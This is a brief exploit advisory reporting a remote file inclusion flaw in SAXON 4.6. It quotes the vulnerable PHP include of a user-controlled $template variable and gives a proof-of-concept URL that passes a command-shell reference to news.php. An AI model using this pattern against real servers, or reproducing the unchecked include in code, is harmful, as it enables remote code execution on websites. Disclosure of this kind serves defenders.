SAXON version 4.6 suffers from a remote file inclusion flaw.
ec593cf95d7478b9f36a91fed9b8c603f6a532b117f6bf36e0de7ee70a025eb8
# SaVSaK.CoM | SpC-x - The-BeKiR |
# SAXON 4.6 Version - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : SAXON
# Credits : SpC-x
# Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke
# Code :
# include("functions.php");
# include "config.php";
# include $template;
# Vulnerable :
# http://www.victim.com/SAXON/news.php?template=Command-Shell